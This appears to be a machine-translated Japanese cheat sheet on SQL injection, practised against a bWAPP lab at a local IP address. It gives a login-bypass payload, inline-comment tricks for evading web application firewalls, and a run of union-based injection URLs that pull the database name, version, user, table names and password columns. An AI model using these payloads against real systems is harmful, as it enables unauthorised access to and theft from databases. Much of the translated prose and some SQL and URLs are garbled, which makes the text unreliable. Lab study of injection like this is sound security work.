INFORMATION_SCHEMA(MySQL5.0のバージョンの後、MySQLデータベースは、デフォルトのINFORMATION_SCHEMAデータベースを格納します)
INFORMATION_SCHEMA 3つのテーブル:
SCHEMATA:テーブルSCHEMA_NAMEストア内のフィールドのユーザーによって作成されたデータベースのすべてのライブラリ名。
TABLES:フィールドTABLE_SCHEMAの表では、TABLE_NAMEは、ユーザーが作成したすべてのデータベースレコードのデータベースとテーブル名でした。
COLUMNS:表中のTABLE_SCHEMAフィールド、TABLE_NAME、COLUMN_NAMEすべてのデータベース・レコードは、ユーザーのライブラリ名によって作成され、テーブル名、フィールド名。
質問
SELECTフィールド名ライブラリ名から、照会されるテーブル名
データベースのフィールド名FROM SELECT名前が照会される。知られている条件テーブルWHEREフィールド名=「値知られている条件
照会するデータベースフィールド名から名前を選択。既知の条件テーブルフィールド名=「値既知の条件ANDフィールド名= 2で知られている条件は 『』既知の値である2 WHERE
ユーザーがSELECT * FROM
ユーザーがSELECT * FROM 0,1を制限
(クエリ機密情報を注入するために使用)の重要な機能
データベース():現在のサイトデータベースを使用します
バージョン():現在のデータベースのバージョン番号
ユーザー():現在のデータベース・ユーザー
CONCAT_WS():複数のエントリの表示
LOAD_FILE():ファイルパスを読み取り、システムファイルを読み取るには16進数に変換する必要があります
ノート
#または - またはスペース// ** //
、ユーザ名からどこ名=「管理者」とパスワード=「123456」からパスワードを選択します
管理者または1 = 1#
ユーザ名、ユーザ名=「admin'or 1 = 1#」とパスワードからパスワード=「123456」から選択
インラインコメント(他の保護用WAFバイパス)
/*!コード*/
/ *!ユニオン* / / *!* / 1,2,3を選択
連合合同問い合わせインジェクション攻撃
http://192.168.100.130/sqli_2.php?movie=4%E2%80%98&action=go
http://192.168.100.130/sqli_2.php?movie=4%20and%201=1&action=go
http://192.168.100.130/sqli_2.php?movie=4%20and%201=2&action=go
http://192.168.100.130/sqli_2.php?movie=4%20order%20by%207--+&action=goテーブルの数を確認します
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,2,3,4,5,6,7%20--+&action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,database(),version(),4,user(),6,7%20--+&action=go
現在のデータベース名:bWAPP
現在のデータベースのバージョン:5.5.47
現在のデータベース・ユーザー名:localhostを
http://192.168.100.130/sqli_2.php?movie=-4組合INFORMATION_SCHEMA.TABLESリミットから1、TABLE_NAME、3,4,5,6,7を選択3,1--&アクション=行きます
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20column_name=0x75736572%20limit%200 、1 - %20&アクション=行きます
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20column_name=0x70617373776f7264%20limit%200 、1 - %20&アクション=行きます